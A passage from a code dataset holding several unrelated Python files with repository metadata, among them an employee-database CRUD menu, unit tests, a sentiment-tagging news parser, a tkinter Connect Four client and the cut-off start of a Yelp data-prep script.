1\n\n while condicao != 0:\n print('[1] - Nome')\n print('[2] - CPF')\n print('[3] - Salário')\n print('[4] - Telefone')\n print('[5] - Função')\n print('[0] - Voltar')\n print('-'*20)\n try:\n opcao = int(input('Sua opção: '))\n if opcao == 1:\n nome = str(input('Novo nome: '))\n print('-'*20)\n\n conexao = conectar()\n with conexao.cursor() as cursor:\n sql = \"UPDATE funcionario SET nome=%s WHERE cpf=%s\"\n cursor.execute(sql, (nome, registro['cpf']))\n conexao.commit()\n conexao.close()\n\n print('Nome atualizado com sucesso !')\n print('-'*20)\n\n elif opcao == 2:\n while condicao != -1:\n cpf = str(input('CPF: '))\n\n if cpf.isnumeric() and len(cpf) == 11 and int(cpf) > 0:\n condicao = -1 \n else:\n print('[ERRO] Somente letras e tamanho deve ser igual a 11')\n\n conexao = conectar()\n with conexao.cursor() as cursor:\n sql = \"UPDATE funcionario SET cpf=%s WHERE cpf=%s\"\n cursor.execute(sql, (cpf, registro['cpf']))\n conexao.commit()\n conexao.close()\n\n registro['cpf'] = cpf\n print('-'*20)\n print('CPF atualizado !')\n print('-'*20)\n\n elif opcao == 3:\n\n while condicao != -3:\n try:\n salario = float(input('Salário: '))\n\n if salario > 0:\n print('-'*20)\n print('Salário atualizado com sucesso !')\n print('-'*20)\n\n conexao = conectar()\n with conexao.cursor() as cursor:\n sql = \"UPDATE funcionario SET salario=%s WHERE cpf=%s\"\n cursor.execute(sql, (salario, registro['cpf']))\n conexao.commit()\n conexao.close()\n \n condicao = -3\n\n else:\n print('[ERROR] Salário não pode ser negativo')\n\n except ValueError:\n\n print('[ERROR] Somente números positivos')\n\n \n elif opcao == 4:\n telefone = str(input('Novo telefone: '))\n\n conexao = conectar()\n with conexao.cursor() as cursor:\n sql = \"UPDATE funcionario SET telefone=%s WHERE cpf=%s\"\n cursor.execute(sql, (telefone, registro['cpf']))\n conexao.commit()\n conexao.close()\n\n print('-'*20)\n print('Telefone atualizado com sucesso !')\n print('-'*20)\n\n elif opcao == 5:\n funcao = Funcao.pesquisar_funcao()\n\n if funcao:\n print(f'Função atualizada para {funcao[\"nome\"]}')\n print('-'*20)\n\n conexao = conectar()\n with conexao.cursor() as cursor:\n sql = \"UPDATE funcionario SET funcao=(SELECT funcao.id FROM funcao WHERE cod=%s) WHERE cpf= %s\"\n cursor.execute(sql, (funcao['cod'], registro['cpf']))\n conexao.commit()\n conexao.close()\n\n elif opcao == 0:\n condicao = 0\n else:\n print('[ERROR] Opção inválida')\n\n except ValueError:\n print('[ERROR] Aceita somente numero')\n \n @staticmethod\n def __deletar_funcionario__():\n registro = Funcionario.pesquisar_funcionario()\n\n if registro:\n conexao = conectar()\n with conexao.cursor() as cursor:\n sql = \"DELETE FROM funcionario WHERE cpf=%s\"\n cursor.execute(sql, (registro['cpf']))\n conexao.commit()\n conexao.close()\n\n print('Excluindo com sucesso !')\n print('-'*20) \n\n else:\n print('[ERROR] Funcionário não cadastrado') ","repo_name":"kladDev/poo-python","sub_path":"OOP/empresa/model/funcionario.py","file_name":"funcionario.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10266949253","text":"from soc.modules.seeder.logic.providers.provider import ParameterValueError\nfrom soc.modules.seeder.logic.providers.provider import MissingParameterError\nfrom soc.modules.seeder.logic.providers.integer import FixedIntegerProvider\nfrom soc.modules.seeder.logic.providers.integer import RandomUniformDistributionIntegerProvider\nfrom soc.modules.seeder.logic.providers.integer import RandomNormalDistributionIntegerProvider\nfrom soc.modules.seeder.logic.providers.integer import SequenceIntegerProvider\nimport unittest\n\n\n__authors__ = [\n '\"Felix Kerekes\" ',\n ]\n\n\nclass FixedIntegerProviderTest(unittest.TestCase):\n \"\"\"Test class for FixedIntegerProvider.\n \"\"\"\n\n def setUp(self):\n self.provider = FixedIntegerProvider()\n\n def tearDown(self):\n pass\n\n def testGetValue(self):\n \"\"\"Tests FixedIntegerProvider.getValue()\n \"\"\"\n value = 5\n self.provider.param_values = {'value': value}\n self.assertEquals(self.provider.getValue(), value)\n\n def testGetValueWithInvalidParameters(self):\n \"\"\"Tests getValue() with an invalid integer value.\n \"\"\"\n value = 'asdf'\n self.provider.param_values = {'value': value}\n self.assertRaises(ParameterValueError, self.provider.getValue)\n\n\n# pylint: disable=W0622\nclass RandomUniformDistributionIntegerProviderTest(unittest.TestCase):\n \"\"\"Test class for RandomUniformDistributionIntegerProvider.\n \"\"\"\n\n def setUp(self):\n self.provider = RandomUniformDistributionIntegerProvider()\n\n def tearDown(self):\n pass\n\n def testGetValue(self):\n \"\"\"Tests getValue()\n \"\"\"\n value = self.provider.getValue()\n self.assertTrue(self.provider.DEFAULT_MIN <= value <=\n self.provider.DEFAULT_MAX)\n min = 0\n max = 10\n self.provider.param_values = {'min': min, 'max': max}\n value = self.provider.getValue()\n self.assertTrue(min <= value <= max)\n\n def testGetValueWithInvalidParameters(self):\n \"\"\"Tests getValue() with invalid min and max parameters.\n \"\"\"\n min = 'asdf'\n max = None\n self.provider.param_values = {'min': min, 'max': max}\n self.assertRaises(ParameterValueError, self.provider.getValue)\n\n\nclass RandomNormalDistributionIntegerProviderTest(unittest.TestCase):\n \"\"\"Test class for NormalIntegerProvider.\n \"\"\"\n\n def setUp(self):\n self.provider = RandomNormalDistributionIntegerProvider()\n\n def tearDown(self):\n pass\n\n def testGetValue(self):\n \"\"\"Tests getValue()\n \"\"\"\n value = self.provider.getValue()\n self.assertTrue(self.provider.DEFAULT_MIN <= value <=\n self.provider.DEFAULT_MAX)\n min = 0\n max = 100\n mean = 50\n variance = 10\n self.provider.param_values = {'min': min,\n 'max': max,\n 'mean': mean,\n 'variance': variance}\n value = self.provider.getValue()\n self.assertTrue(min <= value <= max)\n\n def testGetValueWithInvalidParameters(self):\n \"\"\"Tests getValue() with invalid parameters.\n \"\"\"\n min = 'asdf'\n max = None\n mean = None\n stdev = 'asdf'\n self.provider.param_values = {'min': min,\n 'max': max}\n self.assertRaises(ParameterValueError, self.provider.getValue)\n\n self.provider.param_values = {'mean': mean,\n 'stdev': stdev}\n self.assertRaises(ParameterValueError, self.provider.getValue)\n\n\nclass SequenceIntegerProviderTest(unittest.TestCase):\n \"\"\"Test class for SequenceIntegerProvider.\n \"\"\"\n\n def setUp(self):\n self.provider = SequenceIntegerProvider()\n\n\n def tearDown(self):\n pass\n\n def testGetValue(self):\n \"\"\"Tests getValue()\n \"\"\"\n name = 'test'\n self.provider.param_values = {'name': name}\n\n next = self.provider.DEFAULT_START\n self.assertEquals(self.provider.getValue(), next)\n\n next = next + self.provider.DEFAULT_STEP\n self.assertEquals(self.provider.getValue(), next)\n\n next = next + self.provider.DEFAULT_STEP\n self.assertEquals(self.provider.getValue(), next)\n\n def testGetValueWithInvalidParameters(self):\n \"\"\"Tests getValue() with invalid parameters.\n \"\"\"\n self.assertRaises(MissingParameterError, self.provider.getValue)\n\n name = 'test'\n start = \"asdf\"\n step = None\n\n self.provider.param_values = {'name': name, 'start': start, 'step': step}\n self.assertRaises(ParameterValueError, self.provider.getValue)\n","repo_name":"SRabbelier/Melange","sub_path":"tests/app/soc/modules/seeder/logic/providers/test_integer.py","file_name":"test_integer.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"74438894007","text":"def almostIncreasingSequence(sequence: list) -> bool:\n changes = 0\n if len(sequence) == 2:\n return True\n for i in range(len(sequence)):\n if i + 1 < len(sequence) and sequence[i+1] <= sequence[i]:\n changes += 1\n skipNeighbor = i + \\\n 2 < len(sequence) and sequence[i + 2] <= sequence[i]\n skipBack = i - 1 >= 0 and sequence[i+1] <= sequence[i - 1]\n if skipNeighbor and skipBack or changes >= 2:\n return False\n\n return True\n\n\ndef almostIncreasingSequence2(sequence: list) -> bool:\n droppped = False\n last = prev = min(sequence) - 1\n for elm in sequence:\n if elm <= last:\n if droppped:\n return False\n else:\n droppped = True\n if elm <= prev:\n prev = last\n elif elm >= prev:\n prev = last = elm\n else:\n prev, last = last, elm\n return True\n\n\na1 = [1, 3, 2, 1] # should return False\na2 = [1, 3, 2] # should return True\na3 = [1, 2, 3, 4, 3, 6] # should return True\na4 = [3, 6, 5, 8, 10, 20, 15] # should return False\na5 = [123, -17, -5, 1, 2, 3, 12, 43, 45] # should return True\na6 = [1, 2, 1, 2] # should return False\na7 = [1, 1, 2, 3, 4, 4] # should return False\n\nprint(almostIncreasingSequence2(a1))\n# print(almostIncreasingSequence(a2))\n# print(almostIncreasingSequence(a3))\n# print(almostIncreasingSequence(a4))\n# print(almostIncreasingSequence(a5))\n# print(almostIncreasingSequence(a6))\n# print(almostIncreasingSequence(a7))\n","repo_name":"alxdi4z/code-challenges-python","sub_path":"almost_increasing_sequence.py","file_name":"almost_increasing_sequence.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10509261687","text":"# -*- coding: utf-8 -*-\nimport wx\nfrom vistas.frame_desmantelado_campania import FrameDesmanteladoCampania \n\nfrom modelos.modelArticulos import ModeloArticulos\nfrom modelos.modelReporte import ModeloReporteDesmanteladoCampania\n\nclass ControladorDesmanteladoCampania:\n\tmdlArt = ModeloArticulos()\n\n\tdef __init__(self, parent, camp):\n\t\tself.parent = parent\n\t\tself.camp = camp\n\n\tdef run(self):\n\t\tself.frame = FrameDesmanteladoCampania(self.parent)\n\t\tself.capturarEventos()\n\t\tself.cargarDatos()\n\t\tself.frame.ShowModal()\n\n\tdef capturarEventos(self):\n\t\tself.frame.grilla.Bind(wx.grid.EVT_GRID_CELL_CHANGE, self.ModificarCant)\n\t\tself.frame.btn_generar.Bind(wx.EVT_BUTTON, self.GenerarReporte)\n\n\tdef cargarDatos(self):\n\t\tself.mdlArt.cam_anio = self.camp['anio']\n\t\tself.mdlArt.cam_num = self.camp['numero']\n\t\tself.lista = self.mdlArt.listarNoCobradosNoEntregados()\n\t\tself.cargarGrilla(self.lista)\n\n\tdef cargarGrilla(self, listado):\n\t\ttam = len(listado)\n\t\tself.frame.grilla.AppendRows(tam)\n\t\tself.configurarGrilla(tam)\n\t\tfor i in range(tam):\n\t\t\tself.frame.grilla.SetRowSize(i, 25)\n\t\t\tself.frame.grilla.SetCellValue(i, 0, str(listado[i][0]))\n\t\t\tself.frame.grilla.SetCellValue(i, 1, str(listado[i][1]))\n\t\t\tself.frame.grilla.SetCellValue(i, 2, str(listado[i][2]))\n\t\t\tself.frame.grilla.SetCellValue(i, 3, str(listado[i][3]))\n\t\t\tself.frame.grilla.SetCellValue(i, 4, str(listado[i][4]))\n\t\t\tself.frame.grilla.SetCellValue(i, 5, str(listado[i][5]))\n\t\t\tself.frame.grilla.SetCellValue(i, 6, str(listado[i][6]))\n\t\t\tself.frame.grilla.SetCellValue(i, 7, str(listado[i][7]))\n\t\t\tself.frame.grilla.SetCellValue(i, 8, str(listado[i][8]))\n\n\tdef configurarGrilla(self, filas):\n\t\t\"\"\"Este modulo se encarga de deshabilitar las celdas que no\n\t\t\tdeben ser editables.\"\"\"\n\t\tcolumnas = self.frame.grilla.GetNumberCols()\n\t\tfor j in range(columnas):\n\t\t\tif j != 1:\n\t\t\t\tfor i in range(filas):\n\t\t\t\t\tself.frame.grilla.SetReadOnly(i, j, True)\n\n\tdef ModificarCant(self, event):\n\t\tself.mdlArt.cli_codigo = self.frame.grilla.GetCellValue(event.GetRow(), 0)\n\t\tif self.frame.grilla.GetCellValue(event.GetRow(), 1).isdigit() and len(self.frame.grilla.GetCellValue(event.GetRow(), 1)) <= 2:\n\t\t\tself.mdlArt.cant = int(self.frame.grilla.GetCellValue(event.GetRow(), 1))\n\t\telse:\n\t\t\tself.mdlArt.cant = 0\n\t\tself.mdlArt.updateStock()\n\n\tdef GenerarReporte(self, event):\n\t\tnombreArchivo = \"/Desmantelado.xls\"\n\t\tdialog = wx.DirDialog(self.frame, \"SELECCIONAR CARPETA DE DESTINO:\",style=wx.DD_DEFAULT_STYLE | wx.DD_NEW_DIR_BUTTON)\n\t\trta = dialog.ShowModal()\n\t\tif rta == wx.ID_OK:\n\t\t\tdir = dialog.GetPath()\n\t\t\t\n\t\t\tdir = dir + nombreArchivo\n\t\t\tmdlMRDC = ModeloReporteDesmanteladoCampania(self.lista, dir)\n\t\t\ttry:\n\t\t\t\tmdlMRDC.generar_reporte()\n\t\t\texcept:\n\t\t\t\twx.MessageBox(\"Ha ocurrido un error al generar reporte.\", \"Ups!\")\n\t\t\telse:\n\t\t\t\twx.MessageBox(\"El reporte ha sido generado con exito.\", \"Enhorabuena!\")\n\n\t\tdialog.Destroy()","repo_name":"ihleonel/Proyecto-Distribuidora-304","sub_path":"proxl-plus/controladores/desmanteladoCampania.py","file_name":"desmanteladoCampania.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31799853179","text":"import argparse\nfrom os import path\nfrom tqdm import tqdm\nimport csv\nfrom nltk.tokenize import word_tokenize\nimport csv\nfrom transformers import BertTokenizer, AutoModelForSequenceClassification, pipeline\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\n#\n# config\n#\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--in-file', action='store', dest='in_file',\n help='news file', required=True)\nparser.add_argument('--out-dir', action='store', dest='out_dir',\n help='parsed/pre-processed content dir', required=True)\nparser.add_argument('--mode', action='store', dest='mode',\n help='train or test', required=True)\nparser.add_argument('--max-title', action='store', dest='max_title',\n help='max title length', default=20)\nparser.add_argument('--max-abstract', action='store', dest='max_abstract',\n help='max abstract length', default=50)\nparser.add_argument('--word-embeddings', action='store', dest='word_embeddings',\n help='pre-trained word embeddings', required=True)\nparser.add_argument('--word2int', action='store', dest='word2int',\n help='word to idx map')\nparser.add_argument('--embedding-weights', action='store', dest='embedding_weights',\n help='word embedding weights')\nparser.add_argument('--category2int', action='store', dest='category2int',\n help='category to idx map')\nargs = parser.parse_args()\n\n\n\n# generate word2int + extract embedding weights\ndef process_word_embeddings(word_embeddings_file):\n with open(word_embeddings_file, 'r') as wf:\n print(\"preparing/processing word-embeddings\") \n word_embeddings = wf.readlines()\n embeddings_map = {}\n for word_embedding in tqdm(word_embeddings):\n wdims = word_embedding.split(\" \")\n embeddings_map[wdims[0]] = \" \".join(wdims[1:])\n return embeddings_map\n\ndef load_idx_map_as_dict(file_name):\n with open(file_name, 'r') as file:\n dictionary = {}\n lines = file.readlines()\n for line in tqdm(lines):\n key, value = line.strip().split(\"\\t\")\n dictionary[key] = value\n return dictionary\n\ndef load_embedding_weights(file_name):\n embedding_weights = []\n with open(file_name, 'r') as file: \n lines = file.readlines()\n for line in tqdm(lines):\n embedding_weights.append(line)\n return embedding_weights\n\n# prep embedings/vocab\nembeddings = process_word_embeddings(args.word_embeddings)\n\n# parse news \nwith open(args.in_file, 'r') as in_file:\n with open(path.join(args.out_dir, 'parsed_news.tsv'), 'w') as news_file: \n news_writer = csv.writer(news_file, delimiter='\\t')\n print(\"preparing/processing news content\")\n news_collection = in_file.readlines()\n news2int = {}\n # BERT based sentiment analyzer\n dsb_sentiment_classifier = pipeline('sentiment-analysis', device=1)\n # VADER (rule) based sentiment analyzer\n vader_sentiment_classifier = SentimentIntensityAnalyzer()\n\n # BERT based - emotion analyzer based on go-emotions full\n ge_tokenizer = BertTokenizer.from_pretrained(\"monologg/bert-base-cased-goemotions-original\", max_length=50)\n ge_model = AutoModelForSequenceClassification.from_pretrained(\"monologg/bert-base-cased-goemotions-original\", num_labels=28)\n goemotions = pipeline(\n model=ge_model, \n tokenizer=ge_tokenizer, \n task=\"text-classification\",\n top_k=None,\n function_to_apply='sigmoid',\n device=1\n )\n # BERT based - emotion analyzer based on go-emotions grouped \n ge_grouped_tokenizer = BertTokenizer.from_pretrained(\"monologg/bert-base-cased-goemotions-group\", max_length=50)\n ge_grouped_model = AutoModelForSequenceClassification.from_pretrained(\"monologg/bert-base-cased-goemotions-group\", num_labels=4)\n goemotions_grouped = pipeline(\n model=ge_grouped_model, \n tokenizer=ge_grouped_tokenizer, \n task=\"text-classification\",\n top_k=None,\n function_to_apply='sigmoid',\n device=1\n )\n # BERT based - emotion analyzer based on go-emotions ekman\n ge_ekman_tokenizer = BertTokenizer.from_pretrained(\"monologg/bert-base-cased-goemotions-ekman\", max_length=50)\n ge_ekman_model = AutoModelForSequenceClassification.from_pretrained(\"monologg/bert-base-cased-goemotions-ekman\", num_labels=7)\n goemotions_ekman = pipeline(\n model=ge_ekman_model, \n tokenizer=ge_ekman_tokenizer, \n task=\"text-classification\",\n top_k=None,\n function_to_apply='sigmoid',\n device=1\n )\n # max title/abstract length\n max_title_length = int(args.max_title)\n max_abstract_length = int(args.max_abstract)\n if args.mode == \"train\": \n category2int = {}\n word2int = {}\n embedding_weights = []\n else:\n category2int = load_idx_map_as_dict(args.category2int)\n word2int = load_idx_map_as_dict(args.word2int)\n embedding_weights = load_embedding_weights(args.embedding_weights)\n\n # small helper to convert list of score to string with delimeter\n def scores_to_string(label_scores=[], delimeter=\" \"):\n return delimeter.join(\n map(lambda n: '%.8f'%n, \n [label_score['score'] for label_score in label_scores[0]]\n )) \n\n # iterate over news\n for news in tqdm(news_collection):\n newsid, category, subcategory, title, abstract, _, _, _ = news.strip().split(\"\\t\")\n if newsid not in news2int:\n news2int[newsid] = len(news2int) + 1\n else:\n continue\n # category to int\n if category not in category2int:\n if(args.mode == \"train\"):\n category2int[category] = len(category2int) + 1\n category_id = category2int[category]\n else:\n category_id = 0\n else: \n category_id = category2int[category]\n if subcategory not in category2int:\n if(args.mode == \"train\"):\n category2int[subcategory] = len(category2int) + 1\n subcategory_id = category2int[subcategory]\n else:\n subcategory_id = 0\n else: \n subcategory_id = category2int[subcategory]\n # parse/prep title --> to token ids\n # crop at max-title or pad to max-title\n title_tokens = word_tokenize(title.strip().lower())\n title_word_idxs = []\n for token in title_tokens:\n if token not in embeddings:\n continue\n if token not in word2int:\n word2int[token] = str(len(word2int) + 1)\n embedding_weights.append(embeddings[token])\n title_word_idxs.append(word2int[token])\n \n if len(title_word_idxs) > max_title_length:\n title_word_idxs = title_word_idxs[:max_title_length]\n else:\n title_word_idxs = title_word_idxs + [\"0\"]*(max_title_length-len(title_word_idxs))\n title_word_idxs_str = \" \".join(title_word_idxs)\n # parse/prep abstract --> to token ids\n # crop at max-abstract or pad to max-abstract\n abstract_tokens = word_tokenize(abstract.strip().lower())\n abstract_word_idxs = []\n for token in abstract_tokens:\n if token not in embeddings:\n continue\n if token not in word2int:\n word2int[token] = str(len(word2int) + 1)\n embedding_weights.append(embeddings[token])\n abstract_word_idxs.append(word2int[token])\n if len(abstract_word_idxs) > max_abstract_length:\n abstract_word_idxs = abstract_word_idxs[:max_abstract_length]\n else:\n abstract_word_idxs = abstract_word_idxs + [\"0\"]*(max_abstract_length-len(abstract_word_idxs))\n abstract_word_idxs_str = \" \".join(abstract_word_idxs)\n # calc sentiments scores\n # vader\n vs = vader_sentiment_classifier.polarity_scores(title.strip())\n vader_sentiment = vs['compound']\n # bert\n dsbs_label, dsbs_score = dsb_sentiment_classifier(title.strip())[0].values()\n if(dsbs_label == \"POSITIVE\"):\n bert_sentiment = (1-dsbs_score)*(-1) + dsbs_score\n else:\n bert_sentiment = (dsbs_score)*(-1) + (1-dsbs_score)\n\n input_title = [title.strip()]\n input_title_abstract = [title.strip() + \" \" + abstract.strip()]\n input_abstract = [abstract.strip()] if abstract.strip() else input_title_abstract\n\n # goemotions\n title_emotions = scores_to_string(goemotions(input_title, padding=True, truncation=True))\n abstract_emotions = scores_to_string(goemotions(input_abstract, padding=True, truncation=True))\n title_abstract_emotions = scores_to_string(goemotions(input_title_abstract, padding=True, truncation=True))\n # goemotions grouped\n title_emotions_grouped = scores_to_string(goemotions_grouped(input_title, padding=True, truncation=True))\n abstract_emotions_grouped = scores_to_string(goemotions_grouped(input_abstract, padding=True, truncation=True))\n title_abstract_emotions_grouped = scores_to_string(goemotions_grouped(input_title_abstract, padding=True, truncation=True))\n # ekman\n title_emotions_ekman = scores_to_string(goemotions_ekman(input_title, padding=True, truncation=True))\n abstract_emotions_ekman = scores_to_string(goemotions_ekman(input_abstract, padding=True, truncation=True))\n title_abstract_emotions_ekman = scores_to_string(goemotions_ekman(input_title_abstract, padding=True, truncation=True))\n\n # prepare output\n news_writer.writerow([\n newsid,\n category_id,\n subcategory_id,\n title_word_idxs_str,\n abstract_word_idxs_str,\n vader_sentiment,\n bert_sentiment, \n title_emotions,\n abstract_emotions,\n title_abstract_emotions,\n title_emotions_grouped,\n abstract_emotions_grouped,\n title_abstract_emotions_grouped,\n title_emotions_ekman,\n abstract_emotions_ekman,\n title_abstract_emotions_ekman\n ])\n if args.mode == \"train\":\n with open(path.join(args.out_dir, 'category2int.tsv'), 'w') as file: \n cat_writer = csv.writer(file, delimiter='\\t')\n for key, value in category2int.items():\n cat_writer.writerow([key, value])\n with open(path.join(args.out_dir, 'word2int.tsv'), 'w') as file:\n word_writer = csv.writer(file, delimiter='\\t')\n for key, value in word2int.items():\n word_writer.writerow([key, value])\n with open(path.join(args.out_dir, 'embedding_weights.csv'), 'w') as file:\n for weights in embedding_weights:\n file.write(weights)","repo_name":"MeteSertkan/EmoRec","sub_path":"project/data/parse_news.py","file_name":"parse_news.py","file_ext":"py","file_size_in_byte":11582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"13449028302","text":"#왜 틀렸는지 모르겠다(해결 : 문제를 잘못 읽음)\n#하나는 맨 왼쪽 위 칸이 흰색인 경우, 하나는 검은색인 경우이다. << 요걸 못 읽었네\nimport sys\n\nN, M = map(int, input().split())\nchess = []\nfor i in range(N):\n chess.append(input())\nc=64\n\nfor a in range(N-8+1):\n for b in range(M-8+1):\n cnt = 0\n for j in range(8):\n for i in range(8):\n if 0==(j+a)%2:\n if 0 == (i+b)%2 and 'W' != chess[j+a][i+b]:\n #print('test1',chess[j+a][0][i+b], i+b, j+a) \n cnt+=1\n if 0 != (i+b)%2 and 'B' != chess[j+a][i+b]:\n #print('test2',chess[j+a][0][i+b],i+b,j+a) \n cnt+=1\n else:\n if 0 == (i+b)%2 and 'B' != chess[j+a][i+b]:\n #print('test3',chess[j+a][0][i+b],i+b,j+a) \n cnt+=1\n if 0 != (i+b)%2 and 'W' != chess[j+a][i+b]:\n #print('test4',chess[j+a][0][i+b],i+b,j+a)\n cnt+=1\n #print(cnt)\n c = min(c, min(64-cnt, cnt))\n #c.append(cnt)\n #c.append(cnt2)\n\n\nprint(c) \n#print(min(c))","repo_name":"weed700/coding_test","sub_path":"Baekjoon/Class2/sliver5_1018_체스판 다시 칠하기.py","file_name":"sliver5_1018_체스판 다시 칠하기.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70528510650","text":"from tkinter import Tk, Button, Entry, Frame, Label, messagebox\nimport requests, os, json\n\ndef clear_screen():\n for i in root.winfo_children():\n i.destroy()\n\n\nclass Game():\n def __init__(self):\n self.load_menu()\n self.tiles = [[0 for i in range(7)] for i in range(6)]\n self.url = \"http://127.0.0.1\"\n self.my_turn = False\n self.player_num = None\n self.game_data = {\n \"winner\":None\n }\n \n def load_menu(self):\n clear_screen()\n Label(\n text=\"Menu\",\n font=\"arial 20\"\n ).grid()\n selection_frame = Frame()\n selection_frame.grid()\n\n Button(\n master=selection_frame,\n text=\"Join\",\n width=15,\n height=3,\n font='arial 20',\n command= lambda: self.join_game_menu()\n ).grid(row=0, column=0)\n\n Button(\n master=selection_frame,\n text=\"Host\",\n width=15,\n height=3,\n font='arial 20',\n command= lambda: self.host_game()\n ).grid(row=0, column=1)\n\n def join_game_menu(self):\n clear_screen()\n Label(\n text=\"Join game\",\n font=\"arial 18\",\n width=20\n ).grid()\n\n url_entry = Entry(\n font='arial 18',\n width=20,\n )\n url_entry.insert(0, self.url)\n url_entry.grid()\n\n port_entry = Entry(\n font='arial 18',\n width=20,\n )\n port_entry.insert(0, \"Enter game port ...\")\n port_entry.grid()\n\n Button(\n text=\"Join\",\n font='arial 18',\n width=20,\n command= lambda port_entry=port_entry, url_entry=url_entry: self.join_game(port_entry, url_entry) \n ).grid()\n\n def join_game(self, port_entry, url_entry):\n self.url = url_entry.get()\n try:\n port = port_entry.get()\n if len(port) != 4:\n messagebox.showerror('ERROR','Invalid game code')\n return\n self.port = int(port)\n self.url += \":\" + str(self.port)\n except ValueError:\n messagebox.showerror('ERROR','Invalid game code')\n return\n try:\n req = requests.post(f'{self.url}/join/')\n except:\n messagebox.showerror('Error', \"Game not found\")\n return\n if req.text != 'false':\n self.player_num = int(req.text)\n if self.player_num == 1:\n self.my_turn = True \n self.draw()\n self.update()\n else:\n messagebox.showerror('Game full','Game already full')\n\n def update(self):\n req = requests.get(f'{self.url}/get/')\n if json.loads(req.text)['tiles'] != self.tiles:\n self.tiles = json.loads(req.text)['tiles']\n self.game_data = json.loads(req.text)['game_data']\n if self.game_data['winner']:\n self.draw()\n messagebox.showinfo('Winner', 'You won!!' if self.game_data['winner'] == self.player_num else 'You lost..')\n if self.game_data['on_turn'] == self.player_num:\n self.my_turn = True\n self.draw()\n root.after(1000, self.update)\n\n def draw(self):\n clear_screen()\n\n if self.my_turn:\n Label(\n text=\"Your turn\",\n bg='green',\n fg='white',\n font='arial 15'\n ).grid()\n else:\n Label(\n text=\"Wait for your turn\",\n bg='red',\n fg='white',\n font='arial 15'\n ).grid()\n\n player_symbol = \"X\" if self.player_num == 1 else \"O\"\n\n Label(\n text=f\"Playing as: {player_symbol}\",\n font='arial 15'\n ).grid()\n\n field_frame = Frame()\n field_frame.grid()\n for y, row in enumerate(self.tiles):\n for x, tile in enumerate(row):\n btn_text = \"\"\n btn_color = \"white\" \n if tile == 1:\n btn_text = 'X'\n btn_color = \"red\"\n if tile == 2:\n btn_text = 'O'\n btn_color = \"blue\"\n Button(\n master=field_frame,\n text=btn_text,\n fg='white',\n bg=btn_color,\n width=3,\n font='arial 15',\n border=1\n ).grid(row=y, column=x)\n \n btn_frame = Frame()\n btn_frame.grid()\n\n for x in range(len(self.tiles)+1):\n Button(\n master=btn_frame,\n text=\"\\\\/\",\n font='arial 15',\n width=3,\n border=1,\n bg='black',\n fg='white',\n command= lambda column=x: self.do_turn(column)\n ).grid(row=0, column=x)\n\n #Button(\n # text=\"refresh\",\n # command= lambda: self.update()\n #).grid()\n\n\n def do_turn(self, column):\n if game.my_turn:\n data = {\"player\":self.player_num,\"column\":column}\n req = requests.post(f'{self.url}/user_move/', data=data)\n if req.text != 'false':\n self.my_turn = False\n self.update()\n\n def host_game(self):\n messagebox.showinfo(\"Hosting a game\",\"To host a game run the hoster script\")\n\nroot = Tk()\nroot.title(\"Four in a row\")\n\ngame = Game()\nroot.mainloop()","repo_name":"Donkere-vader/fourOnARowMultiplayer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37746937507","text":"\"\"\"\nSee\nhttps://github.com/NHSDigital/pytest-nhsd-apim/blob/main/tests/test_examples.py\nfor more ideas on how to test the authorization of your API.\n\"\"\"\nimport requests\nimport pytest\nimport os\nfrom lib import Assertions\nfrom lib import Generators\nfrom lib.constants import CORRELATION_IDS\n\nSANDBOX_URL = os.environ.get(\"SANDBOX_URL\")\n\n\n@pytest.mark.skip(reason=\"Sandbox tests are intermittently failing with 503 error\")\n@pytest.mark.parametrize(\"correlation_id\", CORRELATION_IDS)\ndef test_data_invalid(correlation_id):\n invalid_request_body = {\n \"query\": (\n \"query PublishedCohortLibraryGetBySlugName(urlSlug: $urlSlug) {\"\n \"... on Cohort {\"\n \"summary} }\"\n )\n }\n\n error_response = requests.post(\n f\"{SANDBOX_URL}/api\",\n headers=Generators.generate_target_server_headers(correlation_id), json=invalid_request_body\n )\n\n Assertions.assert_error_with_optional_correlation_id(\n error_response,\n 400,\n [{'message': 'An error occurred'}],\n correlation_id\n )\n","repo_name":"NHSDigital/caas-published-cohort-definitions","sub_path":"tests/sandbox_tests/test_sandbox_400_errors.py","file_name":"test_sandbox_400_errors.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"72861286650","text":"import pandas as pd\nimport numpy as np\nimport string, re, random\nimport itertools\n\npd.set_option('max_columns',200)\npd.set_option('display.max_colwidth', -1)\npd.set_option('max_rows',200)\n\n\n#---------Load all LV restaurant reviews\ndf = pd.read_pickle(\"./data/LVdf_restaurants.pkl\") #Loading pd dataframe with ALL LasVegas restaurants reviews\ndf.shape\ndf.head(1)\n\ndf = df.drop(columns=['user_id','attributes','hours','attributes_AcceptsInsurance',\\\n 'attributes_AgesAllowed','attributes_BusinessAcceptsBitcoin','attributes_DogsAllowed',\\\n 'attributes_HairSpecializesIn','attributes_CoatCheck','attributes_BusinessParking',\\\n 'attributes_BikeParking','attributes_ByAppointmentOnly'])\ndf['date'] = pd.to_datetime(df.date)\ndf.columns = df.columns.str.replace('attributes_','')\ndf.columns = df.columns.str.replace('Restaurants','')\ndf = df[df.is_open == 1]\n\ndf = df[df['review_count'] >= 25] #keep restaurants w/ > 25 reviews\nlist(df) #show column names\ndf.shape #874968 reviews total\n\ndf.to_pickle(\"./data/df_LVrestaurantsOpen25+.pkl\")\n\ndf_revsample = df.groupby('business_id').apply(lambda x: 